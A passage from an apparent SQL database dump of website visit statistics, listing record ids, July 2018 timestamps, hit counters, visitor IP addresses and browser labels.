,1,0,0,'54.36.149.101','other'),(265627,1530477508,1,1,0,0,'95.163.255.94','other'),(265628,1530477639,1,1,0,0,'54.36.148.228','other'),(265629,1530477800,1,1,0,0,'54.36.148.215','other'),(265630,1530477865,1,1,0,0,'66.249.66.57','chrome'),(265631,1530477912,1,1,0,0,'54.36.149.20','other'),(265632,1530478362,1,0,1,0,'66.249.66.157',''),(265633,1530478477,1,1,0,0,'54.36.149.79','other'),(265634,1530478486,1,1,0,0,'54.36.148.189','other'),(265635,1530478612,1,1,0,0,'54.36.149.56','other'),(265636,1530478642,2,0,2,0,'66.249.66.155',''),(265637,1530478665,1,1,0,0,'54.36.149.101','other'),(265638,1530479257,1,1,0,0,'54.36.148.159','other'),(265639,1530479523,1,1,0,0,'54.36.148.142','other'),(265640,1530479550,1,1,0,0,'54.36.148.106','other'),(265641,1530479607,1,1,0,0,'54.36.148.137','other'),(265642,1530479639,1,1,0,0,'216.244.66.241','other'),(265643,1530479933,2,0,2,0,'66.249.66.157',''),(265644,1530480218,1,1,0,0,'54.36.148.22','other'),(265645,1530480239,1,1,0,0,'54.36.148.122','other'),(265646,1530480262,1,0,1,0,'66.249.66.155',''),(265647,1530480265,1,1,0,0,'66.249.66.156','chrome'),(265648,1530480276,1,1,0,0,'54.36.148.149','other'),(265649,1530480284,1,1,0,0,'54.36.148.172','other'),(265650,1530480389,1,1,0,0,'54.36.148.195','other'),(265651,1530480508,1,1,0,0,'54.36.148.117','other'),(265652,1530480698,1,1,0,0,'54.36.148.181','other'),(265653,1530480751,1,1,0,0,'8.29.198.26','other'),(265654,1530480963,1,1,0,0,'54.36.148.255','other'),(265655,1530481251,1,1,0,0,'54.36.149.7','other'),(265656,1530481441,1,1,0,0,'37.9.113.182','other'),(265657,1530481481,1,1,0,0,'141.8.142.167','other'),(265658,1530481486,2,2,0,0,'141.8.142.74','other'),(265659,1530481604,1,0,1,0,'66.249.66.155',''),(265660,1530481606,1,1,0,0,'54.165.59.7','other'),(265661,1530481717,1,0,1,0,'66.249.66.157',''),(265662,1530481815,1,1,0,0,'54.36.148.130','other'),(265663,1530482000,1,1,0,0,'54.36.148.248','other'),(265664,1530482176,2,2,0,0,'157.55.39.96','other'),(265665,1530482270,1,1,0,0,'54.36.149.104','other'),(265666,1530482282,1,1,0,0,'216.244.66.241','other'),(265667,1530482321,1,1,0,0,'54.36.148.30','other'),(265668,1530482572,1,1,0,0,'54.36.148.36','other'),(265669,1530482654,1,1,0,0,'54.36.148.166','other'),(265670,1530482961,1,1,0,0,'178.154.171.88','other'),(265671,1530483042,1,0,1,0,'66.249.66.157',''),(265672,1530483063,1,1,0,0,'95.163.255.93','other'),(265673,1530483155,1,1,0,0,'54.36.148.75','other'),(265674,1530483473,1,1,0,0,'54.36.148.192','other'),(265675,1530483537,1,1,0,0,'54.36.148.99','other'),(265676,1530483805,1,1,0,0,'54.36.149.50','other'),(265677,1530483842,1,1,0,0,'54.36.149.67','other'),(265678,1530483853,1,1,0,0,'54.36.149.100','other'),(265679,1530484081,1,0,1,0,'66.249.66.157',''),(265680,1530484215,1,1,0,0,'95.163.255.93','other'),(265681,1530484251,1,1,0,0,'54.36.148.55','other'),(265682,1530484568,1,1,0,0,'54.36.148.184','other'),(265683,1530484653,1,1,0,0,'54.36.148.60','other'),(265684,1530484995,1,1,0,0,'54.36.149.65','other'),(265685,1530485011,1,1,0,0,'66.249.66.61','chrome'),(265686,1530485064,1,1,0,0,'54.36.149.4','other'),(265687,1530485106,1,1,0,0,'54.36.148.190','other'),(265688,1530485117,1,1,0,0,'95.163.255.96','other'),(265689,1530485140,1,1,0,0,'141.8.142.74','other'),(265690,1530485325,1,1,0,0,'54.36.148.221','other'),(265691,1530485360,1,0,1,0,'66.249.66.157',''),(265692,1530485496,1,1,0,0,'54.36.148.205','other'),(265693,1530485503,2,2,0,0,'66.249.66.59','chrome'),(265694,1530485643,1,1,0,0,'54.36.148.37','other'),(265695,1530485658,1,1,0,0,'54.36.149.12','other'),(265696,1530485870,1,1,0,0,'54.36.148.94','other'),(265697,1530486158,1,1,0,0,'46.200.184.76','chrome'),(265698,1530486395,1,0,1,0,'66.249.66.156',''),(265699,1530486458,1,1,0,0,'54.36.149.10','other'),(265700,1530486522,1,1,0,0,'54.36.149.15','other'),(265701,1530486541,1,1,0,0,'54.36.149.40','other'),(265702,1530486631,1,1,0,0,'54.165.59.7','other'),(265703,1530486780,1,1,0,0,'54.36.148.219','other'),(265704,1530486820,1,1,0,0,'54.36.149.82','other'),(265705,1530486972,1,1,0,0,'141.8.142.74','other'),(265706,1530487027,1,1,0,0,'54.36.148.226','other'),(265707,1530487066,1,1,0,0,'66.249.66.59','chrome'),(265708,1530487198,1,1,0,0,'54.36.148.209','other'),(265709,1530487426,1,1,0,0,'8.29.198.25','other'),(265710,1530487450,3,3,0,0,'216.244.66.241','other'),(265711,1530487766,1,1,0,0,'54.36.148.21','other'),(265712,1530488166,1,1,0,0,'54.36.148.18','other'),(265713,1530488434,1,1,0,0,'66.249.66.61','chrome'),(265714,1530488553,1,1,0,0,'54.36.148.208','other'),(265715,1530488670,1,1,0,0,'95.163.255.93','other'),(265716,1530488863,1,1,0,0,'54.36.148.234','other'),(265717,1530489001,1,1,0,0,'54.36.148.154','other'),(265718,1530489205,1,1,0,0,'54.36.148.118','other'),(265719,1530489244,1,1,0,0,'54.36.148.190','other'),(265720,1530489249,1,1,0,0,'87.250.224.46','other'),(265721,1530489312,1,1,0,0,'54.36.149.52','other'),(265722,1530489335,1,1,0,0,'54.36.148.171','other'),(265723,1530489357,1,1,0,0,'54.36.148.184','other'),(265724,1530489413,1,1,0,0,'54.36.148.157','other'),(265725,1530489494,1,1,0,0,'141.8.142.74','other'),(265726,1530489551,1,1,0,0,'54.36.148.196','other'),(265727,1530489561,1,1,0,0,'54.36.148.162','other'),(265728,1530489676,1,1,0,0,'178.154.171.88','other'),(265729,1530490400,1,1,0,0,'141.8.142.74','other'),(265730,1530490445,1,1,0,0,'54.36.148.44','other'),(265731,1530490510,1,1,0,0,'54.36.149.56','other'),(265732,1530490541,1,1,0,0,'54.36.148.170','other'),(265733,1530490658,1,1,0,0,'54.36.148.142','other'),(265734,1530490791,1,1,0,0,'157.55.39.102','other'),(265735,1530490810,1,1,0,0,'54.36.148.209','other'),(265736,1530490850,1,1,0,0,'216.244.66.241','other'),(265737,1530491100,1,1,0,0,'54.36.148.43','other'),(265738,1530491123,1,1,0,0,'87.250.224.46','other'),(265739,1530491151,1,1,0,0,'54.36.148.40','other'),(265740,1530491286,1,1,0,0,'54.36.149.41','other'),(265741,1530491599,1,1,0,0,'8.29.198.25','other'),(265742,1530491607,1,1,0,0,'54.36.148.114','other'),(265743,1530491626,1,1,0,0,'54.36.148.198','other'),(265744,1530491845,1,1,0,0,'54.36.149.1','other'),(265745,1530491893,1,1,0,0,'54.36.149.12','other'),(265746,1530492064,1,1,0,0,'54.36.149.19','other'),(265747,1530492385,1,1,0,0,'54.36.148.128','other'),(265748,1530492393,1,1,0,0,'54.36.149.44','other'),(265749,1530492429,1,1,0,0,'54.36.148.109','other'),(265750,1530492523,1,0,1,0,'66.249.66.157',''),(265751,1530492716,2,2,0,0,'216.244.66.241','other'),(265752,1530492764,1,1,0,0,'54.36.148.46','other'),(265753,1530492882,1,1,0,0,'54.36.148.136','other'),(265754,1530492897,1,1,0,0,'54.36.148.216','other'),(265755,1530492938,1,1,0,0,'54.36.148.133','other'),(265756,1530492944,1,1,0,0,'54.36.148.49','other'),(265757,1530493076,1,1,0,0,'54.36.149.48','other'),(265758,1530493202,1,1,0,0,'157.55.39.97','other'),(265759,1530493213,1,1,0,0,'54.36.148.138','other'),(265760,1530493552,1,1,0,0,'54.36.149.85','other'),(265761,1530493602,1,1,0,0,'54.36.148.189','other'),(265762,1530493720,1,1,0,0,'54.36.148.68','other'),(265763,1530493846,1,1,0,0,'54.36.148.26','other'),(265764,1530493940,1,1,0,0,'54.36.148.58','other'),(265765,1530493953,1,1,0,0,'54.36.148.159','other'),(265766,1530494042,1,1,0,0,'54.36.149.5','other'),(265767,1530494234,2,1,1,0,'66.249.66.156',''),(265768,1530494729,1,1,0,0,'54.36.149.13','other'),(265769,1530494743,1,1,0,0,'54.36.149.90','other'),(265770,1530494881,1,0,1,0,'66.249.66.61',''),(265771,1530494892,1,1,0,0,'54.36.148.141','other'),(265772,1530494907,1,1,0,0,'141.8.142.74','other'),(265773,1530495021,1,1,0,0,'54.36.148.36','other'),(265774,1530495263,1,1,0,0,'54.36.149.94','other'),(265775,1530495291,1,1,0,0,'54.36.148.100','other'),(265776,1530495355,1,1,0,0,'95.163.255.97','other'),(265777,1530495441,1,1,0,0,'54.36.149.91','other'),(265778,1530495488,1,1,0,0,'54.36.148.209','other'),(265779,1530495680,1,1,0,0,'54.36.148.101','other'),(265780,1530495724,2,2,0,0,'216.244.66.241','other'),(265781,1530495726,1,1,0,0,'54.36.148.97','other'),(265782,1530495939,1,1,0,0,'54.36.149.72','other'),(265783,1530496217,1,1,0,0,'54.36.148.12','other'),(265784,1530496424,1,1,0,0,'54.36.149.33','other'),(265785,1530496443,1,1,0,0,'178.154.171.88','other'),(265786,1530496455,1,1,0,0,'54.165.59.7','other'),(265787,1530496601,1,1,0,0,'54.36.148.105','other'),(265788,1530496729,1,1,0,0,'54.36.148.78','other'),(265789,1530496787,1,1,0,0,'95.163.255.95','other'),(265790,1530496810,1,1,0,0,'54.36.149.54','other'),(265791,1530496873,1,1,0,0,'54.36.149.63','other'),(265792,1530496922,1,1,0,0,'54.36.149.57','other'),(265793,1530497003,1,1,0,0,'54.36.148.83','other'),(265794,1530497150,1,1,0,0,'54.36.148.74','other'),(265795,1530497160,1,1,0,0,'66.249.66.59','chrome'),(265796,1530497503,1,1,0,0,'37.9.113.182','other'),(265797,1530497606,1,1,0,0,'87.250.224.46','other'),(265798,1530497721,1,1,0,0,'141.8.142.74','other'),(265799,1530498063,1,1,0,0,'54.36.148.29','other'),(265800,1530498266,1,1,0,0,'8.29.198.26','other'),(265801,1530498358,1,1,0,0,'54.36.148.95','other'),(265802,1530498360,1,1,0,0,'54.36.149.20','other'),(265803,1530498487,1,1,0,0,'54.36.148.134','other'),(265804,1530498688,1,1,0,0,'216.244.66.241','other'),(265805,1530498725,1,1,0,0,'54.36.148.136','other'),(265806,1530498989,1,1,0,0,'54.36.148.193','other'),(265807,1530499104,1,1,0,0,'66.249.66.156','chrome'),(265808,1530499214,1,1,0,0,'54.36.149.62','other'),(265809,1530499254,1,1,0,0,'54.36.149.21','other'),(265810,1530499326,1,1,0,0,'54.36.148.235','other'),(265811,1530499347,1,1,0,0,'54.36.148.94','other'),(265812,1530499582,1,1,0,0,'54.36.149.58','other'),(265813,1530499587,1,1,0,0,'54.36.149.22','other'),(265814,1530499600,1,1,0,0,'95.163.255.99','other'),(265815,1530499690,1,1,0,0,'54.36.148.189','other'),(265816,1530499928,1,1,0,0,'54.36.148.165','other'),(265817,1530500066,1,1,0,0,'178.154.171.88','other'),(265818,1530500153,1,1,0,0,'54.36.148.134','other'),(265819,1530500154,1,1,0,0,'54.36.148.39','other'),(265820,1530500339,1,1,0,0,'54.36.149.57','other'),(265821,1530500464,1,1,0,0,'54.36.148.85','other'),(265822,1530500678,2,2,0,0,'95.163.255.99','other'),(265823,1530500755,1,1,0,0,'54.36.148.19','other'),(265824,1530500809,1,1,0,0,'54.36.149.28','other'),(265825,1530500814,2,2,0,0,'216.244.66.241','other'),(265826,1530500960,1,1,0,0,'54.36.148.208','other'),(265827,1530501014,1,1,0,0,'54.36.148.240','other'),(265828,1530501044,1,1,0,0,'54.36.148.168','other'),(265829,1530501421,1,1,0,0,'54.36.148.137','other'),(265830,1530501543,1,1,0,0,'54.36.149.83','other'),(265831,1530501556,1,1,0,0,'54.36.148.76','other'),(265832,1530501629,1,1,0,0,'66.249.66.57','chrome'),(265833,1530501645,1,1,0,0,'54.36.149.40','other'),(265834,1530502311,1,1,0,0,'54.36.148.20','other'),(265835,1530502320,1,1,0,0,'95.163.255.95','other'),(265836,1530502399,1,1,0,0,'54.36.148.248','other'),(265837,1530502434,1,1,0,0,'8.29.198.25','other'),(265838,1530502847,1,1,0,0,'54.36.149.2','other'),(265839,1530502885,1,1,0,0,'54.36.148.166','other'),(265840,1530503302,1,1,0,0,'54.36.148.193','other'),(265841,1530503391,1,1,0,0,'54.36.148.251','other'),(265842,1530503431,1,1,0,0,'54.36.149.64','other'),(265843,1530503519,1,1,0,0,'66.249.66.157','chrome'),(265844,1530503635,1,1,0,0,'54.36.148.103','other'),(265845,1530504016,1,1,0,0,'54.165.59.7','other'),(265846,1530504475,1,1,0,0,'54.36.148.30','other'),(265847,1530505119,2,2,0,0,'141.8.142.74','other'),(265848,1530505248,1,1,0,0,'178.154.171.88','other'),(265849,1530505627,1,1,0,0,'54.36.148.171','other'),(265850,1530505726,1,1,0,0,'54.36.148.115','other'),(265851,1530505919,1,1,0,0,'54.36.149.104','other'),(265852,1530505984,3,3,0,0,'216.244.66.241','other'),(265853,1530506007,1,1,0,0,'54.36.148.254','other'),(265854,1530506544,1,1,0,0,'54.36.148.212','other'),(265855,1530506635,1,0,1,0,'66.249.66.155',''),(265856,1530506889,1,1,0,0,'54.36.148.169','other'),(265857,1530506906,1,1,0,0,'54.36.148.61','other'),(265858,1530506973,1,1,0,0,'157.55.39.102','other'),(265859,1530507152,1,1,0,0,'54.36.148.188','other'),(265860,1530507179,1,1,0,0,'54.36.149.30','other'),(265861,1530507215,1,1,0,0,'157.55.39.97','other'),(265862,1530507266,1,1,0,0,'54.36.148.71','other'),(265863,1530507409,1,1,0,0,'54.36.148.76','other'),(265864,1530507496,1,1,0,0,'66.249.66.57','chrome'),(265865,1530507524,1,1,0,0,'54.36.148.147','other'),(265866,1530507613,1,1,0,0,'95.163.255.98','other'),(265867,1530507638,1,1,0,0,'54.36.149.71','other'),(265868,1530507796,2,2,0,0,'141.8.142.74','other'),(265869,1530507876,1,1,0,0,'95.163.255.97','other'),(265870,1530507940,1,1,0,0,'54.36.148.210','other'),(265871,1530508008,1,1,0,0,'54.36.149.75','other'),(265872,1530508468,1,0,1,0,'66.249.66.155',''),(265873,1530508475,1,1,0,0,'54.36.148.101','other'),(265874,1530508612,1,1,0,0,'54.36.148.53','other'),(265875,1530508873,1,1,0,0,'54.36.149.107','other'),(265876,1530508894,1,1,0,0,'216.244.66.241','other'),(265877,1530508912,1,1,0,0,'54.36.149.61','other'),(265878,1530509100,1,1,0,0,'8.29.198.25','other'),(265879,1530509352,1,1,0,0,'66.249.66.157','chrome'),(265880,1530509483,1,1,0,0,'54.36.148.216','other'),(265881,1530509847,1,1,0,0,'54.36.148.220','other'),(265882,1530510113,2,0,2,0,'66.249.66.155',''),(265883,1530510203,1,1,0,0,'54.36.148.210','other'),(265884,1530510456,1,1,0,0,'54.36.149.69','other'),(265885,1530510508,1,1,0,0,'54.36.148.157','other'),(265886,1530510569,2,2,0,0,'178.154.171.88','other'),(265887,1530510660,1,1,0,0,'54.36.149.61','other'),(265888,1530510713,1,1,0,0,'54.36.148.176','other'),(265889,1530510720,1,0,1,0,'66.249.66.156',''),(265890,1530510824,1,1,0,0,'52.53.201.78','chrome'),(265891,1530510842,1,1,0,0,'46.201.112.233','chrome'),(265892,1530510851,2,2,0,0,'91.196.178.187','chrome'),(265893,1530510880,1,1,0,0,'54.36.149.39','other'),(265894,1530510908,1,1,0,0,'54.36.148.15','other'),(265895,1530510984,1,1,0,0,'54.36.149.59','other'),(265896,1530511047,1,1,0,0,'54.36.148.156','other'),(265897,1530511346,1,1,0,0,'95.163.255.92','other'),(265898,1530511698,1,1,0,0,'54.36.148.23','other'),(265899,1530511788,1,1,0,0,'216.244.66.241','other'),(265900,1530511876,1,1,0,0,'54.36.148.126','other'),(265901,1530511959,1,1,0,0,'54.36.148.49','other'),(265902,1530512056,1,1,0,0,'54.36.148.217','other'),(265903,1530512211,1,1,0,0,'54.36.148.220','other'),(265904,1530512217,1,1,0,0,'54.36.149.73','other'),(265905,1530512241,1,1,0,0,'54.36.148.21','other'),(265906,1530512895,1,1,0,0,'87.250.224.46','other'),(265907,1530512911,1,1,0,0,'54.36.149.79','other'),(265909,1530512913,1,1,0,0,'66.249.66.59','chrome'),(265910,1530512916,2,2,0,0,'91.196.178.75','chrome'),(265911,1530513028,1,1,0,0,'54.36.149.30','other'),(265912,1530513032,1,1,0,0,'66.249.66.157','chrome'),(265913,1530513175,1,1,0,0,'54.36.149.74','other'),(265914,1530513201,1,1,0,0,'178.154.171.88','other'),(265915,1530513254,1,1,0,0,'54.36.148.150','other'),(265916,1530513261,1,1,0,0,'8.29.198.25','other'),(265917,1530513359,1,1,0,0,'54.36.148.214','other'),(265918,1530513505,1,1,0,0,'54.36.148.114','other'),(265919,1530513509,1,1,0,0,'95.163.255.93','other'),(265920,1530513545,1,1,0,0,'54.36.148.199','other'),(265921,1530513557,1,1,0,0,'54.36.148.99','other'),(265922,1530513580,1,1,0,0,'54.36.148.88','other'),(265923,1530513695,7,7,0,0,'91.124.82.5','chrome'),(265924,1530514010,6,6,0,0,'91.196.178.75','chrome'),(265925,1530514077,1,1,0,0,'141.8.142.167','other'),(265926,1530514101,1,1,0,0,'141.8.142.74','other'),(265927,1530514299,3,3,0,0,'91.196.178.169','chrome'),(265928,1530514327,1,1,0,0,'54.36.149.34','other'),(265929,1530514337,1,1,0,0,'216.244.66.241','other'),(265930,1530514345,1,1,0,0,'54.36.148.160','other'),(265931,1530514357,1,1,0,0,'54.36.149.32','other'),(265932,1530514450,1,0,1,0,'66.249.66.57',''),(265933,1530514706,1,1,0,0,'54.36.148.216','other'),(265934,1530514912,1,1,0,0,'54.36.148.129','other'),(265935,1530515001,2,2,0,0,'91.196.177.46','chrome'),(265936,1530515102,1,1,0,0,'54.36.148.174','other'),(265937,1530515205,1,1,0,0,'95.133.199.144','opera'),(265938,1530515230,1,0,1,0,'66.249.66.157',''),(265939,1530515921,1,1,0,0,'178.154.171.88','other'),(265940,1530516616,1,1,0,0,'95.163.255.97','other'),(265941,1530516713,2,2,0,0,'91.196.178.75','chrome'),(265942,1530516733,1,1,0,0,'31.13.113.67','other'),(265943,1530516746,1,1,0,0,'31.13.114.76','other'),(265944,1530516747,1,1,0,0,'31.13.114.81','other'),(265945,1530516753,1,1,0,0,'54.36.148.33','other'),(265946,1530516768,1,1,0,0,'69.171.251.10','other'),(265947,1530516848,1,1,0,0,'46.211.118.98','other'),(265948,1530517049,1,1,0,0,'54.36.148.112','other'),(265949,1530517097,1,1,0,0,'54.36.148.176','other'),(265950,1530517138,1,1,0,0,'91.124.182.170','chrome'),(265951,1530517245,1,1,0,0,'91.124.182.170','firefox'),(265952,1530517271,1,1,0,0,'54.36.148.204','other'),(265953,1530517349,1,1,0,0,'31.13.111.91','other'),(265954,1530517391,1,1,0,0,'66.220.146.146','other'),(265955,1530517398,1,1,0,0,'141.8.142.74','other'),(265956,1530517435,1,1,0,0,'54.36.148.67','other'),(265957,1530517600,1,1,0,0,'54.36.148.68','other'),(265958,1530517628,1,1,0,0,'54.36.148.117','other'),(265959,1530517635,1,1,0,0,'54.36.148.250','other'),(265960,1530517695,1,1,0,0,'54.36.149.89','other'),(265961,1530517777,1,1,0,0,'216.244.66.241','other'),(265962,1530517868,1,1,0,0,'54.36.148.41','other'),(265963,1530517913,1,1,0,0,'54.36.148.55','other'),(265964,1530518123,1,1,0,0,'54.36.149.73','other'),(265965,1530518238,1,1,0,0,'66.249.66.59','chrome'),(265966,1530518251,1,1,0,0,'66.249.66.155','chrome'),(265967,1530518279,1,1,0,0,'54.36.148.71','other'),(265968,1530518444,2,2,0,0,'91.124.182.170','firefox'),(265969,1530518453,1,0,1,0,'66.249.66.57',''),(265970,1530518468,1,1,0,0,'54.36.149.16','other'),(265971,1530518519,2,2,0,0,'91.196.178.171','chrome'),(265972,1530518551,1,1,0,0,'91.196.177.15','chrome'),(265973,1530518588,1,1,0,0,'54.36.149.103','other'),(265974,1530518767,1,1,0,0,'54.36.149.5','other'),(265975,1530518783,1,1,0,0,'95.132.46.226','chrome'),(265976,1530518918,1,1,0,0,'141.8.142.74','other'),(265977,1530519016,1,1,0,0,'54.36.149.64','other'),(265978,1530519019,1,1,0,0,'54.36.149.81','other'),(265979,1530519046,1,1,0,0,'54.36.149.75','other'),(265980,1530519062,1,1,0,0,'95.163.255.99','other'),(265981,1530519226,1,1,0,0,'66.249.66.57','chrome'),(265982,1530519268,1,1,0,0,'46.211.124.37','chrome'),(265983,1530519336,1,1,0,0,'54.36.149.7','other'),(265984,1530519388,1,1,0,0,'54.36.148.61','other'),(265985,1530519543,1,1,0,0,'54.36.149.62','other'),(265986,1530519550,1,1,0,0,'54.36.149.14','other'),(265987,1530519598,1,1,0,0,'91.196.178.103','chrome'),(265988,1530519765,1,1,0,0,'62.244.28.50','chrome'),(265989,1530519936,1,1,0,0,'8.29.198.26','other'),(265990,1530519948,1,1,0,0,'54.36.148.19','other'),(265991,1530520097,1,1,0,0,'91.124.182.170','firefox'),(265992,1530520166,1,1,0,0,'54.36.148.104','other'),(265993,1530520247,1,1,0,0,'54.36.148.200','other'),(265994,1530520374,1,1,0,0,'69.171.240.177','other'),(265995,1530520681,1,1,0,0,'91.209.11.236','other'),(265996,1530520772,1,1,0,0,'54.36.148.152','other'),(265997,1530520901,1,1,0,0,'54.36.148.219','other'),(265998,1530520979,2,2,0,0,'91.196.179.25','chrome'),(265999,1530521028,1,1,0,0,'216.244.66.241','other'),(266000,1530521222,1,1,0,0,'54.36.148.25','other'),(266001,1530521342,5,5,0,0,'91.196.178.65','chrome'),(266002,1530521499,1,1,0,0,'54.36.148.134','other'),(266003,1530521881,1,1,0,0,'66.249.66.59','chrome'),(266004,1530521961,1,1,0,0,'207.154.223.82','chrome'),(266005,1530522045,4,4,0,0,'216.244.66.241','other'),(266006,1530522084,1,1,0,0,'54.36.149.13','other'),(266007,1530522160,1,1,0,0,'54.36.149.101','other'),(266008,1530522309,1,1,0,0,'185.138.228.251','chrome'),(266009,1530522423,1,1,0,0,'54.36.149.88','other'),(266010,1530522440,1,1,0,0,'54.36.149.72','other'),(266011,1530522455,2,2,0,0,'91.196.178.65','chrome'),(266012,1530522463,1,1,0,0,'66.249.66.156','chrome'),(266013,1530522466,1,1,0,0,'66.249.66.61','chrome'),(266014,1530522560,2,2,0,0,'91.196.178.75','chrome'),(266015,1530522565,1,1,0,0,'31.134.113.35','chrome'),(266016,1530522630,1,1,0,0,'54.36.148.36','other'),(266017,1530522712,1,1,0,0,'54.36.148.125','other'),(266018,1530522723,1,1,0,0,'54.36.148.87','other'),(266019,1530522729,1,1,0,0,'54.36.148.94','other'),(266020,1530522898,1,1,0,0,'54.36.148.251','other'),(266021,1530522943,1,1,0,0,'54.36.148.167','other'),(266022,1530522990,2,2,0,0,'46.211.128.250','chrome'),(266023,1530522995,1,1,0,0,'54.36.148.150','other'),(266024,1530523069,1,1,0,0,'54.36.148.34','other'),(266025,1530523093,1,1,0,0,'91.196.177.46','chrome'),(266026,1530523216,1,1,0,0,'95.163.255.97','other'),(266027,1530523581,1,1,0,0,'54.36.149.19','other'),(266028,1530523837,1,0,1,0,'66.249.66.155',''),(266029,1530523904,1,1,0,0,'54.36.149.28','other'),(266030,1530523906,1,1,0,0,'54.36.148.35','other'),(266031,1530523973,1,1,0,0,'54.36.148.111','other'),(266032,1530524019,1,1,0,0,'54.36.148.177','other'),(266033,1530524050,1,1,0,0,'54.36.148.206','other'),(266034,1530524090,1,1,0,0,'8.29.198.26','other'),(266035,1530524161,1,1,0,0,'54.36.148.12','other'),(266036,1530524393,1,1,0,0,'54.36.148.207','other'),(266037,1530524425,1,1,0,0,'54.36.148.138','other'),(266038,1530524598,1,1,0,0,'54.36.149.50','other'),(266039,1530524722,1,1,0,0,'54.36.148.65','other'),(266040,1530524870,1,1,0,0,'54.36.149.68','other'),(266041,1530524914,1,1,0,0,'54.36.148.92','other'),(266042,1530525048,1,1,0,0,'54.36.149.82','other'),(266043,1530525129,1,1,0,0,'54.36.148.121','other'),(266044,1530525253,2,2,0,0,'216.244.66.241','other'),(266045,1530525299,1,1,0,0,'178.154.171.88','other'),(266046,1530525402,1,1,0,0,'141.8.142.74','other'),(266047,1530525441,1,1,0,0,'54.36.149.74','other'),(266048,1530525538,1,1,0,0,'54.36.148.148','other'),(266049,1530526230,1,1,0,0,'192.162.103.150','chrome'),(266050,1530526262,1,1,0,0,'54.36.148.51','other'),(266051,1530526267,1,1,0,0,'91.196.178.103','chrome'),(266052,1530526329,1,1,0,0,'54.36.148.203','other'),(266053,1530526345,1,1,0,0,'54.36.149.106','other'),(266054,1530526444,1,1,0,0,'54.36.149.91','other'),(266055,1530526654,1,1,0,0,'54.36.148.16','other'),(266056,1530526871,1,1,0,0,'54.36.148.159','other'),(266057,1530527218,1,1,0,0,'54.36.148.212','other'),(266058,1530527270,1,1,0,0,'54.36.149.65','other'),(266059,1530527361,1,1,0,0,'54.36.148.253','other'),(266060,1530527500,1,1,0,0,'54.36.149.44','other'),(266061,1530527625,1,1,0,0,'66.249.66.61','chrome'),(266062,1530527704,1,1,0,0,'54.36.148.215','other'),(266063,1530527714,1,1,0,0,'66.249.66.155','chrome'),(266064,1530527822,1,1,0,0,'69.171.225.86','other'),(266065,1530527869,1,1,0,0,'54.36.148.216','other'),(266066,1530527870,1,1,0,0,'54.36.148.220','other'),(266067,1530527895,4,4,0,0,'216.244.66.241','other'),(266068,1530528007,1,1,0,0,'87.250.224.46','other'),(266069,1530528149,1,1,0,0,'54.36.149.64','other'),(266070,1530528155,1,1,0,0,'54.36.148.210','other'),(266071,1530528640,1,1,0,0,'157.55.39.102','other'),(266072,1530528661,1,1,0,0,'54.36.148.147','other'),(266073,1530528885,1,1,0,0,'141.8.142.74','other'),(266074,1530528944,1,1,0,0,'54.36.149.62','other'),(266075,1530528990,1,1,0,0,'66.220.149.15','other'),(266076,1530529042,1,1,0,0,'54.36.148.22','other'),(266077,1530529161,1,0,1,0,'66.249.66.155',''),(266078,1530529170,1,1,0,0,'54.36.148.218','other'),(266079,1530529200,1,1,0,0,'54.36.148.244','other'),(266080,1530529290,1,1,0,0,'54.36.149.48','other'),(266081,1530529676,1,1,0,0,'54.36.148.133','other'),(266082,1530529732,1,1,0,0,'54.36.148.185','other'),(266083,1530529773,1,1,0,0,'54.36.148.64','other'),(266084,1530529816,2,2,0,0,'91.196.178.171','chrome'),(266085,1530530198,1,1,0,0,'91.196.178.129','chrome'),(266086,1530530285,1,1,0,0,'130.180.209.170','other'),(266087,1530530421,1,1,0,0,'54.36.148.229','other'),(266088,1530530442,1,1,0,0,'46.211.125.104','other'),(266089,1530530444,2,2,0,0,'46.211.125.184','chrome'),(266090,1530530453,2,2,0,0,'134.249.146.125','chrome'),(266091,1530530461,2,2,0,0,'91.196.178.94','chrome'),(266092,1530530557,4,4,0,0,'216.244.66.241','other'),(266093,1530530605,1,1,0,0,'46.211.124.60','chrome'),(266094,1530530711,3,3,0,0,'178.154.171.88','other'),(266095,1530530766,1,1,0,0,'37.54.75.5','chrome'),(266096,1530530780,1,1,0,0,'8.29.198.27','other'),(266097,1530530803,1,1,0,0,'54.36.148.124','other'),(266098,1530530914,2,2,0,0,'54.36.148.249','other'),(266099,1530530970,2,2,0,0,'91.196.178.189','chrome'),(266100,1530531068,1,1,0,0,'46.211.124.149','chrome'),(266101,1530531257,1,1,0,0,'54.36.148.138','other'),(266102,1530531264,1,1,0,0,'54.36.148.181','other'),(266103,1530531297,1,1,0,0,'54.36.148.169','other'),(266104,1530531317,1,1,0,0,'54.36.149.102','other'),(266105,1530531395,1,1,0,0,'87.250.224.46','other'),(266106,1530531663,1,1,0,0,'54.36.148.55','other'),(266107,1530531757,1,1,0,0,'54.36.148.145','other'),(266108,1530531791,1,0,1,0,'66.249.66.61',''),(266109,1530531806,1,1,0,0,'37.54.75.5','chrome'),(266110,1530531833,1,1,0,0,'54.36.148.156','other'),(266111,1530531952,1,1,0,0,'54.36.148.106','other'),(266112,1530531977,1,1,0,0,'216.244.66.241','other'),(266113,1530532104,1,1,0,0,'173.252.86.90','other'),(266114,1530532105,1,1,0,0,'180.76.15.141','other'),(266115,1530532385,1,1,0,0,'54.36.148.187','other'),(266116,1530532411,1,1,0,0,'54.36.148.36','other'),(266117,1530532417,1,1,0,0,'54.36.148.17','other'),(266118,1530532682,1,1,0,0,'54.36.148.112','other'),(266119,1530532709,1,1,0,0,'91.192.200.12','firefox'),(266120,1530532711,1,1,0,0,'54.36.148.223','other'),(266121,1530532746,1,1,0,0,'95.163.255.194','other'),(266122,1530532830,1,1,0,0,'54.36.148.244','other'),(266123,1530532876,1,1,0,0,'66.249.66.57','chrome'),(266124,1530532954,1,1,0,0,'91.124.182.170','firefox'),(266125,1530532973,1,1,0,0,'54.36.149.40','other'),(266126,1530533016,1,1,0,0,'95.163.255.191','other'),(266127,1530533022,1,1,0,0,'54.36.149.66','other'),(266128,1530533150,2,2,0,0,'216.244.66.241','other'),(266129,1530533384,1,1,0,0,'91.196.178.131','firefox'),(266130,1530533385,1,1,0,0,'54.36.148.184','other'),(266131,1530533407,1,1,0,0,'54.36.149.104','other'),(266132,1530533687,1,1,0,0,'94.179.49.124','chrome'),(266133,1530533830,1,0,1,0,'66.249.66.156',''),(266134,1530533836,1,1,0,0,'54.36.148.143','other'),(266135,1530533862,1,1,0,0,'87.250.224.46','other'),(266136,1530534008,3,3,0,0,'91.196.178.171','chrome'),(266137,1530534013,1,1,0,0,'54.36.149.61','other'),(266138,1530534323,1,1,0,0,'54.36.148.92','other'),(266139,1530534328,1,1,0,0,'54.36.149.12','other'),(266140,1530534371,1,1,0,0,'